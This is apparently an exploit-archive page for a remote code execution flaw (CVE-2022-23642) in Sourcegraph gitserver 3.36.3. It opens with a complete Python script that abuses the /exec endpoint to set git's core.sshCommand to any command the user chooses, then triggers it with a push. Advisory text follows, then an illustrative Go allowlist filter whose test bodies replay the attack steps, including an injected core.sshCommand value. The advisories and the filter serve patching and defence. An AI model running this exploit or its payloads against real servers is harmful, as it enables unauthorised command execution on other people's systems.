Sourcegraph Gitserver 3.36.3 Remote Code Execution
Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.
# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.36.3
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3

# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service.
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph

import json
import argparse
import requests


def exploit(host, existing_git, cmd):
    # setting sshCommand: gitserver's /exec endpoint runs "git config core.sshCommand <cmd>"
    data = {
        "Repo": existing_git,
        "Args": ["config", "core.sshCommand", cmd]
    }
    res = requests.get(host + "/exec", json=data).text
    if len(res) > 0:
        print("[-] Didn't work: {}".format(res))
        exit(0)

    # setting fake origin so that a push has an ssh remote to contact
    data = {
        "Repo": existing_git,
        "Args": ["remote", "add", "origin", "git@lolololz:foo/bar.git"]
    }
    res = requests.get(host + "/exec", json=data).text
    if len(res) > 0:
        print("[-] Didn't work: {}".format(res))
        exit(0)

    # triggering command using push: git invokes core.sshCommand instead of ssh
    data = {
        "Repo": existing_git,
        "Args": ["push", "origin", "master"]
    }
    res = requests.get(host + "/exec", json=data).text
    print("[*] Finished executing exploit")


parser = argparse.ArgumentParser()
parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()

host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd

exploit(host, existing_git, cmd)
Related news
A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections, which filter the commands that can be executed through the git exec REST API, to take effect.
Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which makes git run the specified command instead of ssh whenever it needs to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed: an attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.
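Both advisories above describe the fix as filtering the git subcommands that the exec REST API will run. The following Go program is an added, illustrative version of such a filter written for this page; it is not Sourcegraph's own code, and the `ExecRequest` field names, the allowlist contents and the sample bodies are assumptions taken from the exploit script above rather than from the project's source. It replays the three requests the exploit sends and shows each one being refused, while a read-only request is still accepted.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// ExecRequest mirrors the JSON body used by the exploit script above: a
// repository name and a git argument vector. The field names are assumed
// from that script, not taken from Sourcegraph's source.
type ExecRequest struct {
	Repo string   `json:"Repo"`
	Args []string `json:"Args"`
}

// allowedSubcommands is a constructed allowlist of read-only git subcommands
// that a code-search service plausibly needs. Anything that can change
// repository configuration or contact a remote ("config", "remote", "push",
// "fetch") is deliberately absent.
var allowedSubcommands = map[string]bool{
	"rev-parse": true, "log": true, "show": true, "ls-tree": true,
	"diff": true, "cat-file": true, "rev-list": true, "blame": true,
}

var (
	ErrEmptyArgs            = errors.New("empty git argument vector")
	ErrGlobalOption         = errors.New("global git option before the subcommand is not permitted")
	ErrDisallowedSubcommand = errors.New("git subcommand not in allowlist")
)

// ValidateExecArgs accepts an argument vector only if args[0] is an
// allowlisted subcommand. Rejecting a leading "-" matters because git also
// accepts configuration inline ("git -c key=value <subcommand>"), so a filter
// that only blocks the "config" subcommand would leave core.sshCommand reachable.
func ValidateExecArgs(args []string) error {
	if len(args) == 0 {
		return ErrEmptyArgs
	}
	if strings.HasPrefix(args[0], "-") {
		return fmt.Errorf("%w: %q", ErrGlobalOption, args[0])
	}
	if !allowedSubcommands[args[0]] {
		return fmt.Errorf("%w: %q", ErrDisallowedSubcommand, args[0])
	}
	return nil
}

// CheckRequestBody decodes a /exec JSON body and validates its Args; this is
// the check a reverse proxy or the handler itself would run before spawning git.
func CheckRequestBody(body []byte) error {
	var req ExecRequest
	if err := json.Unmarshal(body, &req); err != nil {
		return fmt.Errorf("malformed request body: %w", err)
	}
	if req.Repo == "" {
		return errors.New("missing Repo")
	}
	return ValidateExecArgs(req.Args)
}

func main() {
	// Constructed bodies replaying the three steps of the exploit above, an
	// inline-config variant, and a benign read-only request that must pass.
	samples := []string{
		`{"Repo":"example.org/foo/bar","Args":["config","core.sshCommand","id"]}`,
		`{"Repo":"example.org/foo/bar","Args":["remote","add","origin","git@lolololz:foo/bar.git"]}`,
		`{"Repo":"example.org/foo/bar","Args":["push","origin","master"]}`,
		`{"Repo":"example.org/foo/bar","Args":["-c","core.sshCommand=id","push","origin","master"]}`,
		`{"Repo":"example.org/foo/bar","Args":["log","--oneline","-n","5"]}`,
	}
	for _, s := range samples {
		if err := CheckRequestBody([]byte(s)); err != nil {
			fmt.Printf("BLOCK %s\n  reason: %v\n", s, err)
		} else {
			fmt.Printf("ALLOW %s\n", s)
		}
	}
}
```

An allowlist of subcommands is the durable shape for this control: a denylist of `config`, `remote` and `push` would have to be revisited every time git grows a new way to run a helper, whereas a short list of read-only subcommands only changes when the service itself needs something new. The check belongs at the boundary that the advisory calls out, in front of any internal service that accepts an argument vector over HTTP, and the request log line it produces on `BLOCK` is a useful detection signal in its own right.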